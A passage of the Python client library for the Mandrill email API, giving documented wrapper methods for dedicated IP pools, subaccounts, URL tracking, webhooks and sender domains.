Returns: struct. Information about the updated state of the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. UnknownPoolError: The provided dedicated IP pool does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key InvalidEmptyDefaultPoolError: You cannot remove the last IP from your default IP pool. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'pool': pool, 'create_pool': create_pool} return self.master.call('ips/set-pool', _params) def delete(self, ip): """Deletes a dedicated IP. This is permanent and cannot be undone. Args: ip (string): the dedicated ip to remove from your account Returns: struct. 
a description of the ip that was removed from your account.:: ip (string): the ip address deleted (string): a boolean indicating whether the ip was successfully deleted Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/delete', _params) def list_pools(self, ): """Lists your dedicated IP pools. Returns: array. the dedicated IP pools for your account, up to a maximum of 1,000:: [] (struct): information about each dedicated IP pool:: [].name (string): this pool's name [].created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format [].ips (array): the dedicated IPs in this pool:: [].ips[] (struct): information about each dedicated IP:: [].ips[].ip (string): the ip address [].ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].ips[].pool (string): the name of the pool that this dedicated IP belongs to [].ips[].domain (string): the domain name (reverse dns) of this dedicated IP [].ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: [].ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip [].ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid [].ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error [].ips[].warmup (struct): information about the ip's warmup status:: [].ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode [].ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format [].ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a 
valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('ips/list-pools', _params) def pool_info(self, pool): """Describes a single dedicated IP pool. Args: pool (string): a pool name Returns: struct. Information about the dedicated ip pool:: name (string): this pool's name created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format ips (array): the dedicated IPs in this pool:: ips[] (struct): information about each dedicated IP:: ips[].ip (string): the ip address ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].pool (string): the name of the pool that this dedicated IP belongs to ips[].domain (string): the domain name (reverse dns) of this dedicated IP ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error ips[].warmup (struct): information about the ip's warmup status:: ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownPoolError: The provided dedicated IP pool does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/pool-info', _params) def create_pool(self, pool): """Creates a pool and returns it. 
If a pool already exists with this name, no action will be performed. Args: pool (string): the name of a pool to create Returns: struct. Information about the dedicated ip pool:: name (string): this pool's name created_at (string): the date and time that this pool was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format ips (array): the dedicated IPs in this pool:: ips[] (struct): information about each dedicated IP:: ips[].ip (string): the ip address ips[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].pool (string): the name of the pool that this dedicated IP belongs to ips[].domain (string): the domain name (reverse dns) of this dedicated IP ips[].custom_dns (struct): information about the ip's custom dns, if it has been configured:: ips[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip ips[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid ips[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error ips[].warmup (struct): information about the ip's warmup status:: ips[].warmup.warming_up (boolean): whether the ip is currently in warmup mode ips[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format ips[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/create-pool', _params) def delete_pool(self, pool): """Deletes a pool. A pool must be empty before you can delete it, and you cannot delete your default pool. Args: pool (string): the name of the pool to delete Returns: struct. 
information about the status of the pool that was deleted:: pool (string): the name of the pool deleted (boolean): whether the pool was deleted Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownPoolError: The provided dedicated IP pool does not exist. InvalidDeleteDefaultPoolError: The default pool cannot be deleted. InvalidDeleteNonEmptyPoolError: Non-empty pools cannot be deleted. Error: A general Mandrill error has occurred """ _params = {'pool': pool} return self.master.call('ips/delete-pool', _params) def check_custom_dns(self, ip, domain): """Tests whether a domain name is valid for use as the custom reverse DNS for a dedicated IP. Args: ip (string): a dedicated ip address domain (string): the domain name to test Returns: struct. validation results for the domain:: valid (string): whether the domain name has a correctly-configured A record pointing to the ip address error (string): if valid is false, this will contain details about why the domain's A record is incorrect Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownIPError: The provided dedicated IP does not exist. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'domain': domain} return self.master.call('ips/check-custom-dns', _params) def set_custom_dns(self, ip, domain): """Configures the custom DNS name for a dedicated IP. Args: ip (string): a dedicated ip address domain (string): a domain name to set as the dedicated IP's custom dns name. Returns: struct. 
information about the dedicated IP's new configuration:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownIPError: The provided dedicated IP does not exist. InvalidCustomDNSError: The domain name is not configured for use as the dedicated IP's custom reverse DNS. InvalidCustomDNSPendingError: A custom DNS change for this dedicated IP is currently pending. Error: A general Mandrill error has occurred """ _params = {'ip': ip, 'domain': domain} return self.master.call('ips/set-custom-dns', _params) class Internal(object): def __init__(self, master): self.master = master class Subaccounts(object): def __init__(self, master): self.master = master def list(self, q=None): """Get the list of subaccounts defined for the account, optionally filtered by a prefix Args: q (string): an optional prefix to filter the subaccounts' ids and names Returns: array. 
the subaccounts for the account, up to a maximum of 1,000:: [] (struct): the individual subaccount info:: [].id (string): a unique indentifier for the subaccount [].name (string): an optional display name for the subaccount [].custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation [].status (string): the current sending status of the subaccount, one of "active" or "paused" [].reputation (integer): the subaccount's current reputation on a scale from 0 to 100 [].created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format [].sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) [].sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) [].sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'q': q} return self.master.call('subaccounts/list', _params) def add(self, id, name=None, notes=None, custom_quota=None): """Add a new subaccount Args: id (string): a unique identifier for the subaccount to be used in sending calls name (string): an optional display name to further identify the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation Returns: struct. 
the information saved about the new subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota} return self.master.call('subaccounts/add', _params) def info(self, id): """Given the ID of an existing subaccount, return the data about it Args: id (string): the unique identifier of the subaccount to query Returns: struct. the information about the subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. 
If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created sent_hourly (integer): the number of emails the subaccount has sent in the last hour hourly_quota (integer): the current hourly quota for the subaccount, either manual or reputation-based last_30_days (struct): stats for this subaccount in the last 30 days:: last_30_days.sent (integer): the number of emails sent for this subaccount in the last 30 days last_30_days.hard_bounces (integer): the number of emails hard bounced for this subaccount in the last 30 days last_30_days.soft_bounces (integer): the number of emails soft bounced for this subaccount in the last 30 days last_30_days.rejects (integer): the number of emails rejected for sending this subaccount in the last 30 days last_30_days.complaints (integer): the number of spam complaints for this subaccount in the last 30 days last_30_days.unsubs (integer): the number of unsbuscribes for this subaccount in the last 30 days last_30_days.opens (integer): the number of times emails have been opened for this subaccount in the last 30 days last_30_days.unique_opens (integer): the number of unique opens for emails sent for this subaccount in the last 30 days last_30_days.clicks (integer): the number of URLs that 
have been clicked for this subaccount in the last 30 days last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this subaccount in the last 30 days Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/info', _params) def update(self, id, name=None, notes=None, custom_quota=None): """Update an existing subaccount Args: id (string): the unique identifier of the subaccount to update name (string): an optional display name to further identify the subaccount notes (string): optional extra text to associate with the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. If not specified, Mandrill will manage this based on reputation Returns: struct. the information for the updated subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. 
If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id, 'name': name, 'notes': notes, 'custom_quota': custom_quota} return self.master.call('subaccounts/update', _params) def delete(self, id): """Delete an existing subaccount. Any email related to the subaccount will be saved, but stats will be removed and any future sending calls to this subaccount will fail. Args: id (string): the unique identifier of the subaccount to delete Returns: struct. the information for the deleted subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. 
If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/delete', _params) def pause(self, id): """Pause a subaccount's sending. Any future emails delivered to this subaccount will be queued for a maximum of 3 days until the subaccount is resumed. Args: id (string): the unique identifier of the subaccount to pause Returns: struct. the information for the paused subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. 
If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/pause', _params) def resume(self, id): """Resume a paused subaccount's sending Args: id (string): the unique identifier of the subaccount to resume Returns: struct. the information for the resumed subaccount:: id (string): a unique indentifier for the subaccount name (string): an optional display name for the subaccount custom_quota (integer): an optional manual hourly quota for the subaccount. 
If not specified, the hourly quota will be managed based on reputation status (string): the current sending status of the subaccount, one of "active" or "paused" reputation (integer): the subaccount's current reputation on a scale from 0 to 100 created_at (string): the date and time that the subaccount was created as a UTC string in YYYY-MM-DD HH:MM:SS format first_sent_at (string): the date and time that the subaccount first sent as a UTC string in YYYY-MM-DD HH:MM:SS format sent_weekly (integer): the number of emails the subaccount has sent so far this week (weeks start on midnight Monday, UTC) sent_monthly (integer): the number of emails the subaccount has sent so far this month (months start on midnight of the 1st, UTC) sent_total (integer): the number of emails the subaccount has sent since it was created Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('subaccounts/resume', _params) class Urls(object): def __init__(self, master): self.master = master def list(self, ): """Get the 100 most clicked URLs Returns: array. the 100 most clicked URLs and their stats:: [] (struct): the individual URL stats:: [].url (string): the URL to be tracked [].sent (integer): the number of emails that contained the URL [].clicks (integer): the number of times the URL has been clicked from a tracked email [].unique_clicks (integer): the number of unique emails that have generated clicks for this URL Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('urls/list', _params) def search(self, q): """Return the 100 most clicked URLs that match the search query given Args: q (string): a search query Returns: array. 
the 100 most clicked URLs matching the search query:: [] (struct): the URL matching the query:: [].url (string): the URL to be tracked [].sent (integer): the number of emails that contained the URL [].clicks (integer): the number of times the URL has been clicked from a tracked email [].unique_clicks (integer): the number of unique emails that have generated clicks for this URL Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'q': q} return self.master.call('urls/search', _params) def time_series(self, url): """Return the recent history (hourly stats for the last 30 days) for a url Args: url (string): an existing URL Returns: array. the array of history information:: [] (struct): the information for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent with the URL during the hour [].clicks (integer): the number of times the URL was clicked during the hour [].unique_clicks (integer): the number of unique clicks generated for emails sent with this URL during the hour Raises: UnknownUrlError: The requested URL has not been seen in a tracked link InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'url': url} return self.master.call('urls/time-series', _params) def tracking_domains(self, ): """Get the list of tracking domains set up for this account Returns: array. 
the tracking domains and their status:: [] (struct): the individual tracking domain:: [].domain (string): the tracking domain name [].created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format [].cname (struct): details about the domain's CNAME record:: [].cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill [].cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].cname.error (string): an error describing the CNAME record, or null if the record is correct [].valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('urls/tracking-domains', _params) def add_tracking_domain(self, domain): """Add a tracking domain to your account Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the tracking domain name created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format cname (struct): details about the domain's CNAME record:: cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. 
If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. cname.error (string): an error describing the CNAME record, or null if the record is correct valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('urls/add-tracking-domain', _params) def check_tracking_domain(self, domain): """Checks the CNAME settings for a tracking domain. The domain must have been added already with the add-tracking-domain call Args: domain (string): an existing tracking domain name Returns: struct. information about the tracking domain:: domain (string): the tracking domain name created_at (string): the date and time that the tracking domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format cname (struct): details about the domain's CNAME record:: cname.valid (boolean): whether the domain's CNAME record is valid for use with Mandrill cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. cname.error (string): an error describing the CNAME record, or null if the record is correct valid_tracking (boolean): whether this domain can be used as a tracking domain for email. Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownTrackingDomainError: The provided tracking domain does not exist. 
Error: A general Mandrill error has occurred """ _params = {'domain': domain} return self.master.call('urls/check-tracking-domain', _params) class Webhooks(object): def __init__(self, master): self.master = master def list(self, ): """Get the list of all webhooks defined on the account Returns: array. the webhooks associated with the account:: [] (struct): the individual webhook info:: [].id (integer): a unique integer indentifier for the webhook [].url (string): The URL that the event data will be posted to [].description (string): a description of the webhook [].auth_key (string): the key used to requests for this webhook [].events (array): The message events that will be posted to the hook:: [].events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) [].created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format [].batches_sent (integer): the number of event batches that have ever been sent to this webhook [].events_sent (integer): the total number of events that have ever been sent to this webhook [].last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('webhooks/list', _params) def add(self, url, description=None, events=[]): """Add a new webhook Args: url (string): the URL to POST batches of events description (string): an optional description of the webhook events (array): an optional list of events that will be posted to the webhook:: events[] (string): the individual event to listen for Returns: struct. 
the information saved about the new webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'url': url, 'description': description, 'events': events} return self.master.call('webhooks/add', _params) def info(self, id): """Given the ID of an existing webhook, return the data about it Args: id (integer): the unique identifier of a webhook belonging to this account Returns: struct. 
the information about the webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('webhooks/info', _params) def update(self, id, url, description=None, events=[]): """Update an existing webhook Args: id (integer): the unique identifier of a webhook belonging to this account url (string): the URL to POST batches of events description (string): an optional description of the webhook events (array): an optional list of events that will be posted to the webhook:: events[] (string): the individual event to listen for Returns: struct. 
the information for the updated webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id, 'url': url, 'description': description, 'events': events} return self.master.call('webhooks/update', _params) def delete(self, id): """Delete an existing webhook Args: id (integer): the unique identifier of a webhook belonging to this account Returns: struct. 
the information for the deleted webhook:: id (integer): a unique integer indentifier for the webhook url (string): The URL that the event data will be posted to description (string): a description of the webhook auth_key (string): the key used to requests for this webhook events (array): The message events that will be posted to the hook:: events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject) created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format batches_sent (integer): the number of event batches that have ever been sent to this webhook events_sent (integer): the total number of events that have ever been sent to this webhook last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownWebhookError: The requested webhook does not exist Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('webhooks/delete', _params) class Senders(object): def __init__(self, master): self.master = master def list(self, ): """Return the senders that have tried to use this account. Returns: array. 
an array of sender data, one for each sending addresses used by the account:: [] (struct): the information on each sending address in the account:: [].address (string): the sender's email address [].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the total number of messages sent by this sender [].hard_bounces (integer): the total number of hard bounces by messages by this sender [].soft_bounces (integer): the total number of soft bounces by messages by this sender [].rejects (integer): the total number of rejected messages by this sender [].complaints (integer): the total number of spam complaints received for messages by this sender [].unsubs (integer): the total number of unsubscribe requests received for messages by this sender [].opens (integer): the total number of times messages by this sender have been opened [].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked [].unique_opens (integer): the number of unique opens for emails sent for this sender [].unique_clicks (integer): the number of unique clicks for emails sent for this sender Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('senders/list', _params) def domains(self, ): """Returns the sender domains that have been added to this account. Returns: array. 
an array of sender domain data, one for each sending domain used by the account:: [] (struct): the information on each sending domain for the account:: [].domain (string): the sender domain name [].created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format [].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format [].spf (struct): details about the domain's SPF record:: [].spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill [].spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].spf.error (string): an error describing the spf record, or null if the record is correct [].dkim (struct): details about the domain's DKIM record:: [].dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill [].dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. [].dkim.error (string): an error describing the DKIM record, or null if the record is correct [].verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format [].valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. 
If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('senders/domains', _params) def add_domain(self, domain): """Adds a sender domain to your account. Sender domains are added automatically as you send, but you can use this call to add them ahead of time. Args: domain (string): a domain name Returns: struct. information about the domain:: domain (string): the sender domain name created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format spf (struct): details about the domain's SPF record:: spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. spf.error (string): an error describing the spf record, or null if the record is correct dkim (struct): details about the domain's DKIM record:: dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it. 
